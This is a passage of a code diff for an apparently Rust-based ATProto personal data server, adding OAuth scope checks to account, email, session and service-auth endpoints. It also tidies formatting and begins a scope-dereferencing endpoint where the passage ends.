+ .blocks_for_path(&key, &mut relevant_blocks) 542 + .await 543 + .is_err() 544 + { 545 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get new MST blocks for path"}))).into_response(); 546 } 547 + if mst 548 + .blocks_for_path(&key, &mut relevant_blocks) 549 + .await 550 + .is_err() 551 + { 552 return (StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError", "message": "Failed to get old MST blocks for path"}))).into_response(); 553 } 554 relevant_blocks.insert(record_cid, bytes::Bytes::from(record_bytes));
+57 -13
src/api/server/account_status.rs
··· 133 "https://{}/xrpc/com.atproto.server.activateAccount", 134 std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 135 ); 136 - let did = match crate::auth::validate_token_with_dpop( 137 &state.db, 138 &extracted.token, 139 extracted.is_dpop, ··· 144 ) 145 .await 146 { 147 - Ok(user) => user.did, 148 Err(e) => return ApiError::from(e).into_response(), 149 }; 150 let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 151 .fetch_optional(&state.db) 152 .await ··· 171 { 172 warn!("Failed to sequence identity event for activation: {}", e); 173 } 174 (StatusCode::OK, Json(json!({}))).into_response() 175 } 176 Err(e) => { ··· 206 "https://{}/xrpc/com.atproto.server.deactivateAccount", 207 std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 208 ); 209 - let did = match crate::auth::validate_token_with_dpop( 210 &state.db, 211 &extracted.token, 212 extracted.is_dpop, ··· 217 ) 218 .await 219 { 220 - Ok(user) => user.did, 221 Err(e) => return ApiError::from(e).into_response(), 222 }; 223 let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 224 .fetch_optional(&state.db) 225 .await ··· 236 if let Some(ref h) = handle { 237 let _ = state.cache.delete(&format!("handle:{}", h)).await; 238 } 239 - if let Err(e) = 240 - crate::api::repo::record::sequence_account_event(&state, &did, false, Some("deactivated")).await 241 { 242 warn!("Failed to sequence account deactivation event: {}", e); 243 } ··· 315 .into_response(); 316 } 317 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 318 - if let Err(e) = crate::comms::enqueue_account_deletion( 319 - &state.db, 320 - user_id, 321 - &confirmation_token, 322 - &hostname, 323 - ) 324 - .await 325 { 326 warn!("Failed to enqueue account deletion notification: {:?}", e); 327 } ··· 501 Json(json!({"error": "InternalError"})), 502 ) 503 .into_response(); 504 } 505 let _ = state.cache.delete(&format!("handle:{}", handle)).await; 506 info!("Account {} deleted successfully", did);
··· 133 "https://{}/xrpc/com.atproto.server.activateAccount", 134 std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 135 ); 136 + let auth_user = match crate::auth::validate_token_with_dpop( 137 &state.db, 138 &extracted.token, 139 extracted.is_dpop, ··· 144 ) 145 .await 146 { 147 + Ok(user) => user, 148 Err(e) => return ApiError::from(e).into_response(), 149 }; 150 + 151 + if let Err(e) = crate::auth::scope_check::check_account_scope( 152 + auth_user.is_oauth, 153 + auth_user.scope.as_deref(), 154 + crate::oauth::scopes::AccountAttr::Repo, 155 + crate::oauth::scopes::AccountAction::Manage, 156 + ) { 157 + return e; 158 + } 159 + 160 + let did = auth_user.did; 161 let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 162 .fetch_optional(&state.db) 163 .await ··· 182 { 183 warn!("Failed to sequence identity event for activation: {}", e); 184 } 185 + if let Err(e) = 186 + crate::api::repo::record::sequence_empty_commit_event(&state, &did).await 187 + { 188 + warn!( 189 + "Failed to sequence empty commit event for activation: {}", 190 + e 191 + ); 192 + } 193 (StatusCode::OK, Json(json!({}))).into_response() 194 } 195 Err(e) => { ··· 225 "https://{}/xrpc/com.atproto.server.deactivateAccount", 226 std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()) 227 ); 228 + let auth_user = match crate::auth::validate_token_with_dpop( 229 &state.db, 230 &extracted.token, 231 extracted.is_dpop, ··· 236 ) 237 .await 238 { 239 + Ok(user) => user, 240 Err(e) => return ApiError::from(e).into_response(), 241 }; 242 + 243 + if let Err(e) = crate::auth::scope_check::check_account_scope( 244 + auth_user.is_oauth, 245 + auth_user.scope.as_deref(), 246 + crate::oauth::scopes::AccountAttr::Repo, 247 + crate::oauth::scopes::AccountAction::Manage, 248 + ) { 249 + return e; 250 + } 251 + 252 + let did = auth_user.did; 253 let handle = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 254 .fetch_optional(&state.db) 255 .await ··· 266 if let Some(ref h) = handle { 267 let _ = state.cache.delete(&format!("handle:{}", h)).await; 268 } 269 + if let Err(e) = crate::api::repo::record::sequence_account_event( 270 + &state, 271 + &did, 272 + false, 273 + Some("deactivated"), 274 + ) 275 + .await 276 { 277 warn!("Failed to sequence account deactivation event: {}", e); 278 } ··· 350 .into_response(); 351 } 352 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 353 + if let Err(e) = 354 + crate::comms::enqueue_account_deletion(&state.db, user_id, &confirmation_token, &hostname) 355 + .await 356 { 357 warn!("Failed to enqueue account deletion notification: {:?}", e); 358 } ··· 532 Json(json!({"error": "InternalError"})), 533 ) 534 .into_response(); 535 + } 536 + if let Err(e) = crate::api::repo::record::sequence_account_event( 537 + &state, 538 + did, 539 + false, 540 + Some("deleted"), 541 + ) 542 + .await 543 + { 544 + warn!( 545 + "Failed to sequence account deletion event for {}: {}", 546 + did, e 547 + ); 548 } 549 let _ = state.cache.delete(&format!("handle:{}", handle)).await; 550 info!("Account {} deleted successfully", did);
+41 -14
src/api/server/email.rs
··· 52 }; 53 54 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 55 - let did = match auth_result { 56 - Ok(user) => user.did, 57 Err(e) => return ApiError::from(e).into_response(), 58 }; 59 60 let user = match sqlx::query!("SELECT id, handle, email FROM users WHERE did = $1", did) 61 .fetch_optional(&state.db) 62 .await ··· 167 }; 168 169 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 170 - let did = match auth_result { 171 - Ok(user) => user.did, 172 Err(e) => return ApiError::from(e).into_response(), 173 }; 174 175 let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 176 .fetch_one(&state.db) 177 .await ··· 274 return ApiError::InternalError.into_response(); 275 } 276 277 - if let Err(_) = tx.commit().await { 278 return ApiError::InternalError.into_response(); 279 } 280 ··· 310 }; 311 312 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 313 - let did = match auth_result { 314 - Ok(user) => user.did, 315 Err(e) => return ApiError::from(e).into_response(), 316 }; 317 318 - let user = match sqlx::query!( 319 - "SELECT id, email FROM users WHERE did = $1", 320 - did 321 - ) 322 - .fetch_optional(&state.db) 323 - .await 324 { 325 Ok(Some(row)) => row, 326 _ => { ··· 451 .execute(&mut *tx) 452 .await; 453 454 - if let Err(_) = tx.commit().await { 455 return ApiError::InternalError.into_response(); 456 } 457
··· 52 }; 53 54 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 55 + let auth_user = match auth_result { 56 + Ok(user) => user, 57 Err(e) => return ApiError::from(e).into_response(), 58 }; 59 60 + if let Err(e) = crate::auth::scope_check::check_account_scope( 61 + auth_user.is_oauth, 62 + auth_user.scope.as_deref(), 63 + crate::oauth::scopes::AccountAttr::Email, 64 + crate::oauth::scopes::AccountAction::Manage, 65 + ) { 66 + return e; 67 + } 68 + 69 + let did = auth_user.did; 70 let user = match sqlx::query!("SELECT id, handle, email FROM users WHERE did = $1", did) 71 .fetch_optional(&state.db) 72 .await ··· 177 }; 178 179 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 180 + let auth_user = match auth_result { 181 + Ok(user) => user, 182 Err(e) => return ApiError::from(e).into_response(), 183 }; 184 185 + if let Err(e) = crate::auth::scope_check::check_account_scope( 186 + auth_user.is_oauth, 187 + auth_user.scope.as_deref(), 188 + crate::oauth::scopes::AccountAttr::Email, 189 + crate::oauth::scopes::AccountAction::Manage, 190 + ) { 191 + return e; 192 + } 193 + 194 + let did = auth_user.did; 195 let user_id = match sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 196 .fetch_one(&state.db) 197 .await ··· 294 return ApiError::InternalError.into_response(); 295 } 296 297 + if tx.commit().await.is_err() { 298 return ApiError::InternalError.into_response(); 299 } 300 ··· 330 }; 331 332 let auth_result = crate::auth::validate_bearer_token(&state.db, &token).await; 333 + let auth_user = match auth_result { 334 + Ok(user) => user, 335 Err(e) => return ApiError::from(e).into_response(), 336 }; 337 338 + if let Err(e) = crate::auth::scope_check::check_account_scope( 339 + auth_user.is_oauth, 340 + auth_user.scope.as_deref(), 341 + crate::oauth::scopes::AccountAttr::Email, 342 + crate::oauth::scopes::AccountAction::Manage, 343 + ) { 344 + return e; 345 + } 346 + 347 + let did = auth_user.did; 348 + let user = match sqlx::query!("SELECT id, email FROM users WHERE did = $1", did) 349 + .fetch_optional(&state.db) 350 + .await 351 { 352 Ok(Some(row)) => row, 353 _ => { ··· 478 .execute(&mut *tx) 479 .await; 480 481 + if tx.commit().await.is_err() { 482 return ApiError::InternalError.into_response(); 483 } 484
+15 -15
src/api/server/password.rs
··· 8 }; 9 use bcrypt::{DEFAULT_COST, hash, verify}; 10 use chrono::{Duration, Utc}; 11 - use uuid::Uuid; 12 use serde::Deserialize; 13 use serde_json::json; 14 use tracing::{error, info, warn}; 15 16 fn generate_reset_code() -> String { 17 crate::util::generate_token_code() ··· 19 fn extract_client_ip(headers: &HeaderMap) -> String { 20 if let Some(forwarded) = headers.get("x-forwarded-for") 21 && let Ok(value) = forwarded.to_str() 22 - && let Some(first_ip) = value.split(',').next() { 23 - return first_ip.trim().to_string(); 24 - } 25 if let Some(real_ip) = headers.get("x-real-ip") 26 - && let Ok(value) = real_ip.to_str() { 27 - return value.trim().to_string(); 28 - } 29 "unknown".to_string() 30 } 31 ··· 99 .into_response(); 100 } 101 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 102 - if let Err(e) = 103 - crate::comms::enqueue_password_reset(&state.db, user_id, &code, &hostname).await 104 { 105 warn!("Failed to enqueue password reset notification: {:?}", e); 106 } ··· 335 ) 336 .into_response(); 337 } 338 - let user = sqlx::query_as::<_, (Uuid, String)>( 339 - "SELECT id, password_hash FROM users WHERE did = $1", 340 - ) 341 - .bind(&auth.0.did) 342 - .fetch_optional(&state.db) 343 - .await; 344 let (user_id, password_hash) = match user { 345 Ok(Some(row)) => row, 346 Ok(None) => {
··· 8 }; 9 use bcrypt::{DEFAULT_COST, hash, verify}; 10 use chrono::{Duration, Utc}; 11 use serde::Deserialize; 12 use serde_json::json; 13 use tracing::{error, info, warn}; 14 + use uuid::Uuid; 15 16 fn generate_reset_code() -> String { 17 crate::util::generate_token_code() ··· 19 fn extract_client_ip(headers: &HeaderMap) -> String { 20 if let Some(forwarded) = headers.get("x-forwarded-for") 21 && let Ok(value) = forwarded.to_str() 22 + && let Some(first_ip) = value.split(',').next() 23 + { 24 + return first_ip.trim().to_string(); 25 + } 26 if let Some(real_ip) = headers.get("x-real-ip") 27 + && let Ok(value) = real_ip.to_str() 28 + { 29 + return value.trim().to_string(); 30 + } 31 "unknown".to_string() 32 } 33 ··· 101 .into_response(); 102 } 103 let hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 104 + if let Err(e) = crate::comms::enqueue_password_reset(&state.db, user_id, &code, &hostname).await 105 { 106 warn!("Failed to enqueue password reset notification: {:?}", e); 107 } ··· 336 ) 337 .into_response(); 338 } 339 + let user = 340 + sqlx::query_as::<_, (Uuid, String)>("SELECT id, password_hash FROM users WHERE did = $1") 341 + .bind(&auth.0.did) 342 + .fetch_optional(&state.db) 343 + .await; 344 let (user_id, password_hash) = match user { 345 Ok(Some(row)) => row, 346 Ok(None) => {
+50 -22
src/api/server/service_auth.rs
··· 55 Some(t) => t, 56 None => return ApiError::AuthenticationRequired.into_response(), 57 }; 58 - let auth_user = match crate::auth::validate_bearer_token_for_service_auth(&state.db, &token).await { 59 - Ok(user) => user, 60 - Err(e) => return ApiError::from(e).into_response(), 61 - }; 62 - let key_bytes = match auth_user.key_bytes { 63 - Some(kb) => kb, 64 None => { 65 return ApiError::AuthenticationFailedMsg( 66 "OAuth tokens cannot create service auth".into(), ··· 71 72 let lxm = params.lxm.as_deref(); 73 let lxm_for_token = lxm.unwrap_or("*"); 74 75 let user_status = sqlx::query!( 76 "SELECT takedown_ref FROM users WHERE did = $1", ··· 95 .into_response(); 96 } 97 98 - if let Some(method) = lxm { 99 - if PROTECTED_METHODS.contains(&method) { 100 - return ( 101 StatusCode::BAD_REQUEST, 102 Json(json!({ 103 "error": "InvalidRequest", ··· 105 })), 106 ) 107 .into_response(); 108 - } 109 } 110 111 if let Some(exp) = params.exp { ··· 146 } 147 } 148 149 - let service_token = 150 - match crate::auth::create_service_token(&auth_user.did, &params.aud, lxm_for_token, &key_bytes) { 151 - Ok(t) => t, 152 - Err(e) => { 153 - error!("Failed to create service token: {:?}", e); 154 - return ( 155 - StatusCode::INTERNAL_SERVER_ERROR, 156 - Json(json!({"error": "InternalError"})), 157 - ) 158 - .into_response(); 159 - } 160 - }; 161 ( 162 StatusCode::OK, 163 Json(GetServiceAuthOutput {
··· 55 Some(t) => t, 56 None => return ApiError::AuthenticationRequired.into_response(), 57 }; 58 + let auth_user = 59 + match crate::auth::validate_bearer_token_for_service_auth(&state.db, &token).await { 60 + Ok(user) => user, 61 + Err(e) => return ApiError::from(e).into_response(), 62 + }; 63 + let key_bytes = match &auth_user.key_bytes { 64 + Some(kb) => kb.clone(), 65 None => { 66 return ApiError::AuthenticationFailedMsg( 67 "OAuth tokens cannot create service auth".into(), ··· 72 73 let lxm = params.lxm.as_deref(); 74 let lxm_for_token = lxm.unwrap_or("*"); 75 + 76 + if let Some(method) = lxm { 77 + if let Err(e) = crate::auth::scope_check::check_rpc_scope( 78 + auth_user.is_oauth, 79 + auth_user.scope.as_deref(), 80 + &params.aud, 81 + method, 82 + ) { 83 + return e; 84 + } 85 + } else if auth_user.is_oauth { 86 + let permissions = auth_user.permissions(); 87 + if !permissions.has_full_access() { 88 + return ( 89 + StatusCode::BAD_REQUEST, 90 + Json(json!({ 91 + "error": "InvalidRequest", 92 + "message": "OAuth tokens with granular scopes must specify an lxm parameter" 93 + })), 94 + ) 95 + .into_response(); 96 + } 97 + } 98 99 let user_status = sqlx::query!( 100 "SELECT takedown_ref FROM users WHERE did = $1", ··· 119 .into_response(); 120 } 121 122 + if let Some(method) = lxm 123 + && PROTECTED_METHODS.contains(&method) 124 + { 125 + return ( 126 StatusCode::BAD_REQUEST, 127 Json(json!({ 128 "error": "InvalidRequest", ··· 130 })), 131 ) 132 .into_response(); 133 } 134 135 if let Some(exp) = params.exp { ··· 170 } 171 } 172 173 + let service_token = match crate::auth::create_service_token( 174 + &auth_user.did, 175 + &params.aud, 176 + lxm_for_token, 177 + &key_bytes, 178 + ) { 179 + Ok(t) => t, 180 + Err(e) => { 181 + error!("Failed to create service token: {:?}", e); 182 + return ( 183 + StatusCode::INTERNAL_SERVER_ERROR, 184 + Json(json!({"error": "InternalError"})), 185 + ) 186 + .into_response(); 187 + } 188 + }; 189 ( 190 StatusCode::OK, 191 Json(GetServiceAuthOutput {
+49 -36
src/api/server/session.rs
··· 16 fn extract_client_ip(headers: &HeaderMap) -> String { 17 if let Some(forwarded) = headers.get("x-forwarded-for") 18 && let Ok(value) = forwarded.to_str() 19 - && let Some(first_ip) = value.split(',').next() { 20 - return first_ip.trim().to_string(); 21 - } 22 if let Some(real_ip) = headers.get("x-real-ip") 23 - && let Ok(value) = real_ip.to_str() { 24 - return value.trim().to_string(); 25 - } 26 "unknown".to_string() 27 } 28 ··· 36 } 37 38 fn full_handle(stored_handle: &str, pds_hostname: &str) -> String { 39 - if stored_handle.contains('.') { 40 stored_handle.to_string() 41 } else { 42 format!("{}.{}", stored_handle, pds_hostname) ··· 191 State(state): State<AppState>, 192 BearerAuthAllowDeactivated(auth_user): BearerAuthAllowDeactivated, 193 ) -> Response { 194 match sqlx::query!( 195 r#"SELECT 196 handle, email, email_verified, is_admin, deactivated_at, ··· 209 crate::comms::CommsChannel::Telegram => ("telegram", row.telegram_verified), 210 crate::comms::CommsChannel::Signal => ("signal", row.signal_verified), 211 }; 212 - let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 213 let handle = full_handle(&row.handle, &pds_hostname); 214 let is_active = row.deactivated_at.is_none(); 215 Json(json!({ 216 "handle": handle, 217 "did": auth_user.did, 218 - "email": row.email, 219 - "emailVerified": row.email_verified, 220 "preferredChannel": preferred_channel, 221 "preferredChannelVerified": preferred_channel_verified, 222 "isAdmin": row.is_admin, 223 "active": is_active, 224 "status": if is_active { "active" } else { "deactivated" }, 225 "didDoc": {} 226 - })).into_response() 227 } 228 Ok(None) => ApiError::AuthenticationFailed.into_response(), 229 Err(e) => { ··· 433 crate::comms::CommsChannel::Telegram => ("telegram", u.telegram_verified), 434 crate::comms::CommsChannel::Signal => ("signal", u.signal_verified), 435 }; 436 - let pds_hostname = std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 437 let handle = full_handle(&u.handle, &pds_hostname); 438 Json(json!({ 439 "accessJwt": new_access_meta.token, ··· 446 "preferredChannelVerified": preferred_channel_verified, 447 "isAdmin": u.is_admin, 448 "active": true 449 - })).into_response() 450 } 451 Ok(None) => { 452 error!("User not found for existing session: {}", session_row.did); ··· 500 Ok(Some(row)) => row, 501 Ok(None) => { 502 warn!("User not found for confirm_signup: {}", input.did); 503 - return ApiError::InvalidRequest("Invalid DID or verification code".into()).into_response(); 504 } 505 Err(e) => { 506 error!("Database error in confirm_signup: {:?}", e); ··· 532 } 533 if verification.expires_at < Utc::now() { 534 warn!("Verification code expired for user: {}", input.did); 535 - return ApiError::ExpiredTokenMsg("Verification code has expired".into()) 536 - .into_response(); 537 } 538 539 let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) { ··· 549 crate::comms::CommsChannel::Telegram => "telegram_verified", 550 crate::comms::CommsChannel::Signal => "signal_verified", 551 }; 552 - let update_query = format!( 553 - "UPDATE users SET {} = TRUE WHERE did = $1", 554 - verified_column 555 - ); 556 if let Err(e) = sqlx::query(&update_query) 557 .bind(&input.did) 558 .execute(&state.db) ··· 567 row.id 568 ) 569 .execute(&state.db) 570 - .await { 571 error!("Failed to delete verification record: {:?}", e); 572 } 573 ··· 603 if let Err(e) = crate::comms::enqueue_welcome(&state.db, row.id, &hostname).await { 604 warn!("Failed to enqueue welcome notification: {:?}", e); 605 } 606 - let email_verified = matches!( 607 - row.channel, 608 - crate::comms::CommsChannel::Email 609 - ); 610 let preferred_channel = match row.channel { 611 crate::comms::CommsChannel::Email => "email", 612 crate::comms::CommsChannel::Discord => "discord", ··· 688 return ApiError::InternalError.into_response(); 689 } 690 let (channel_str, recipient) = match row.channel { 691 - crate::comms::CommsChannel::Email => { 692 - ("email", row.email.unwrap_or_default()) 693 - } 694 - crate::comms::CommsChannel::Discord => { 695 - ("discord", row.discord_id.unwrap_or_default()) 696 - } 697 crate::comms::CommsChannel::Telegram => { 698 ("telegram", row.telegram_username.unwrap_or_default()) 699 } 700 - crate::comms::CommsChannel::Signal => { 701 - ("signal", row.signal_number.unwrap_or_default()) 702 - } 703 }; 704 if let Err(e) = crate::comms::enqueue_signup_verification( 705 &state.db, ··· 740 .and_then(|v| v.to_str().ok()) 741 .and_then(|v| v.strip_prefix("Bearer ")) 742 .and_then(|token| crate::auth::get_jti_from_token(token).ok()); 743 - let result = sqlx::query_as::<_, (i32, String, chrono::DateTime<chrono::Utc>, chrono::DateTime<chrono::Utc>)>( 744 r#" 745 SELECT id, access_jti, created_at, refresh_expires_at 746 FROM session_tokens ··· 759 id: id.to_string(), 760 created_at: created_at.to_rfc3339(), 761 expires_at: expires_at.to_rfc3339(), 762 - is_current: current_jti.as_ref().map_or(false, |j| j == &access_jti), 763 }) 764 .collect(); 765 (StatusCode::OK, Json(ListSessionsOutput { sessions })).into_response()
··· 16 fn extract_client_ip(headers: &HeaderMap) -> String { 17 if let Some(forwarded) = headers.get("x-forwarded-for") 18 && let Ok(value) = forwarded.to_str() 19 + && let Some(first_ip) = value.split(',').next() 20 + { 21 + return first_ip.trim().to_string(); 22 + } 23 if let Some(real_ip) = headers.get("x-real-ip") 24 + && let Ok(value) = real_ip.to_str() 25 + { 26 + return value.trim().to_string(); 27 + } 28 "unknown".to_string() 29 } 30 ··· 38 } 39 40 fn full_handle(stored_handle: &str, pds_hostname: &str) -> String { 41 + let suffix = format!(".{}", pds_hostname); 42 + if stored_handle.ends_with(&suffix) || stored_handle.ends_with(pds_hostname) { 43 stored_handle.to_string() 44 } else { 45 format!("{}.{}", stored_handle, pds_hostname) ··· 194 State(state): State<AppState>, 195 BearerAuthAllowDeactivated(auth_user): BearerAuthAllowDeactivated, 196 ) -> Response { 197 + let permissions = auth_user.permissions(); 198 + let can_read_email = permissions.allows_email_read(); 199 + 200 match sqlx::query!( 201 r#"SELECT 202 handle, email, email_verified, is_admin, deactivated_at, ··· 215 crate::comms::CommsChannel::Telegram => ("telegram", row.telegram_verified), 216 crate::comms::CommsChannel::Signal => ("signal", row.signal_verified), 217 }; 218 + let pds_hostname = 219 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 220 let handle = full_handle(&row.handle, &pds_hostname); 221 let is_active = row.deactivated_at.is_none(); 222 + let email_value = if can_read_email { 223 + row.email.clone() 224 + } else { 225 + None 226 + }; 227 + let email_verified_value = can_read_email && row.email_verified; 228 Json(json!({ 229 "handle": handle, 230 "did": auth_user.did, 231 + "email": email_value, 232 + "emailVerified": email_verified_value, 233 "preferredChannel": preferred_channel, 234 "preferredChannelVerified": preferred_channel_verified, 235 "isAdmin": row.is_admin, 236 "active": is_active, 237 "status": if is_active { "active" } else { "deactivated" }, 238 "didDoc": {} 239 + })) 240 + .into_response() 241 } 242 Ok(None) => ApiError::AuthenticationFailed.into_response(), 243 Err(e) => { ··· 447 crate::comms::CommsChannel::Telegram => ("telegram", u.telegram_verified), 448 crate::comms::CommsChannel::Signal => ("signal", u.signal_verified), 449 }; 450 + let pds_hostname = 451 + std::env::var("PDS_HOSTNAME").unwrap_or_else(|_| "localhost".to_string()); 452 let handle = full_handle(&u.handle, &pds_hostname); 453 Json(json!({ 454 "accessJwt": new_access_meta.token, ··· 461 "preferredChannelVerified": preferred_channel_verified, 462 "isAdmin": u.is_admin, 463 "active": true 464 + })) 465 + .into_response() 466 } 467 Ok(None) => { 468 error!("User not found for existing session: {}", session_row.did); ··· 516 Ok(Some(row)) => row, 517 Ok(None) => { 518 warn!("User not found for confirm_signup: {}", input.did); 519 + return ApiError::InvalidRequest("Invalid DID or verification code".into()) 520 + .into_response(); 521 } 522 Err(e) => { 523 error!("Database error in confirm_signup: {:?}", e); ··· 549 } 550 if verification.expires_at < Utc::now() { 551 warn!("Verification code expired for user: {}", input.did); 552 + return ApiError::ExpiredTokenMsg("Verification code has expired".into()).into_response(); 553 } 554 555 let key_bytes = match crate::config::decrypt_key(&row.key_bytes, row.encryption_version) { ··· 565 crate::comms::CommsChannel::Telegram => "telegram_verified", 566 crate::comms::CommsChannel::Signal => "signal_verified", 567 }; 568 + let update_query = format!("UPDATE users SET {} = TRUE WHERE did = $1", verified_column); 569 if let Err(e) = sqlx::query(&update_query) 570 .bind(&input.did) 571 .execute(&state.db) ··· 580 row.id 581 ) 582 .execute(&state.db) 583 + .await 584 + { 585 error!("Failed to delete verification record: {:?}", e); 586 } 587 ··· 617 if let Err(e) = crate::comms::enqueue_welcome(&state.db, row.id, &hostname).await { 618 warn!("Failed to enqueue welcome notification: {:?}", e); 619 } 620 + let email_verified = matches!(row.channel, crate::comms::CommsChannel::Email); 621 let preferred_channel = match row.channel { 622 crate::comms::CommsChannel::Email => "email", 623 crate::comms::CommsChannel::Discord => "discord", ··· 699 return ApiError::InternalError.into_response(); 700 } 701 let (channel_str, recipient) = match row.channel { 702 + crate::comms::CommsChannel::Email => ("email", row.email.unwrap_or_default()), 703 + crate::comms::CommsChannel::Discord => ("discord", row.discord_id.unwrap_or_default()), 704 crate::comms::CommsChannel::Telegram => { 705 ("telegram", row.telegram_username.unwrap_or_default()) 706 } 707 + crate::comms::CommsChannel::Signal => ("signal", row.signal_number.unwrap_or_default()), 708 }; 709 if let Err(e) = crate::comms::enqueue_signup_verification( 710 &state.db, ··· 745 .and_then(|v| v.to_str().ok()) 746 .and_then(|v| v.strip_prefix("Bearer ")) 747 .and_then(|token| crate::auth::get_jti_from_token(token).ok()); 748 + let result = sqlx::query_as::< 749 + _, 750 + ( 751 + i32, 752 + String, 753 + chrono::DateTime<chrono::Utc>, 754 + chrono::DateTime<chrono::Utc>, 755 + ), 756 + >( 757 r#" 758 SELECT id, access_jti, created_at, refresh_expires_at 759 FROM session_tokens ··· 772 id: id.to_string(), 773 created_at: created_at.to_rfc3339(), 774 expires_at: expires_at.to_rfc3339(), 775 + is_current: current_jti.as_ref() == Some(&access_jti), 776 }) 777 .collect(); 778 (StatusCode::OK, Json(ListSessionsOutput { sessions })).into_response()
+123 -11
src/api/temp.rs
··· 6 http::{HeaderMap, StatusCode}, 7 response::{IntoResponse, Response}, 8 }; 9 - use serde::Serialize; 10 use serde_json::json; 11 12 #[derive(Serialize)] 13 #[serde(rename_all = "camelCase")] ··· 23 if let Some(token) = 24 extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok())) 25 && let Ok(user) = validate_bearer_token(&state.db, &token).await 26 - && user.is_oauth { 27 - return ( 28 - StatusCode::FORBIDDEN, 29 - Json(json!({ 30 - "error": "Forbidden", 31 - "message": "OAuth credentials are not supported for this endpoint" 32 - })), 33 - ) 34 - .into_response(); 35 - } 36 Json(CheckSignupQueueOutput { 37 activated: true, 38 place_in_queue: None, ··· 40 }) 41 .into_response() 42 }
··· 6 http::{HeaderMap, StatusCode}, 7 response::{IntoResponse, Response}, 8 }; 9 + use cid::Cid; 10 + use jacquard_repo::storage::BlockStore; 11 + use serde::{Deserialize, Serialize}; 12 use serde_json::json; 13 + use std::str::FromStr; 14 15 #[derive(Serialize)] 16 #[serde(rename_all = "camelCase")] ··· 26 if let Some(token) = 27 extract_bearer_token_from_header(headers.get("Authorization").and_then(|h| h.to_str().ok())) 28 && let Ok(user) = validate_bearer_token(&state.db, &token).await 29 + && user.is_oauth 30 + { 31 + return ( 32 + StatusCode::FORBIDDEN, 33 + Json(json!({ 34 + "error": "Forbidden", 35 + "message": "OAuth credentials are not supported for this endpoint" 36 + })), 37 + ) 38 + .into_response(); 39 + } 40 Json(CheckSignupQueueOutput { 41 activated: true, 42 place_in_queue: None, ··· 44 }) 45 .into_response() 46 } 47 + 48 + #[derive(Deserialize)] 49 + #[serde(rename_all = "camelCase")] 50 + pub struct DereferenceScopeInput { 51 + pub scope: String, 52 + } 53 + 54 + #[derive(Serialize)] 55 + #[serde(rename_all = "camelCase")] 56 + pub struct DereferenceScopeOutput { 57 + pub scope: String, 58 + } 59 + 60 + pub async fn dereference_scope( 61 + State(state): State<AppState>, 62 + headers: HeaderMap, 63 + Json(input): Json<DereferenceScopeInput>, 64 + ) -> Response { 65 + let token = match extract_bearer_token_from_header( 66 + headers.get("Authorization").and_then(|h| h.to_str().ok()), 67 + ) { 68 + Some(t) => t, 69 + None => { 70 + return ( 71 + StatusCode::UNAUTHORIZED, 72 + Json(json!({"error": "AuthenticationRequired"})), 73 + ) 74 + .into_response(); 75 + } 76 + }; 77 + 78 + if validate_bearer_token(&state.db, &token).await.is_err() { 79 + return ( 80 + StatusCode::UNAUTHORIZED, 81 + Json(json!({"error": "AuthenticationFailed"})), 82 + ) 83 + .into_response(); 84 + } 85 + 86 + let scope_parts: Vec<&str> = input.scope.split_whitespace().collect(); 87 + let mut resolved_scopes: Vec<String> = Vec::new(); 88 + 89 + for part in scope_parts { 90 + if let Some(cid_str) = part.strip_prefix("ref:") { 91 + let cache_key = format!("scope_ref:{}", cid_str); 92 + if let Some(cached) = state.cache.get(&cache_key).await { 93 + for s in cached.split_whitespace() { 94 + if !resolved_scopes.contains(&s.to_string()) { 95 + resolved_scopes.push(s.to_string()); 96 + } 97 + } 98 + continue; 99 + } 100 + 101 + let cid = match Cid::from_str(cid_str) { 102 + Ok(c) => c, 103 + Err(_) => { 104 + tracing::warn!("Invalid CID in scope ref: {}", cid_str); 105 + continue; 106 + } 107 + }; 108 + 109 + let block_bytes = match state.block_store.get(&cid).await { 110 + Ok(Some(b)) => b, 111 + Ok(None) => { 112 + tracing::warn!("Scope ref block not found: {}", cid_str); 113 + continue; 114 + } 115 + Err(e) => { 116 + tracing::warn!("Error fetching scope ref block {}: {:?}", cid_str, e); 117 + continue; 118 + } 119 + }; 120 + 121 + let scope_record: serde_json::Value = match serde_ipld_dagcbor::from_slice(&block_bytes) 122 + { 123 + Ok(v) => v, 124 + Err(e) => { 125 + tracing::warn!("Failed to decode scope ref block {}: {:?}", cid_str, e); 126 + continue; 127 + } 128 + }; 129 + 130 + if let Some(scope_value) = scope_record.get("scope").and_then(|v| v.as_str()) { 131 + let _ = state 132 + .cache 133 + .set( 134 + &cache_key, 135 + scope_value, 136 + std::time::Duration::from_secs(3600), 137 + ) 138 + .await; 139 + for s in scope_value.split_whitespace() { 140 + if !resolved_scopes.contains(&s.to_string()) { 141 + resolved_scopes.push(s.to_string()); 142 + } 143 + } 144 + } 145 + } else if !resolved_scopes.contains(&part.to_string()) { 146 + 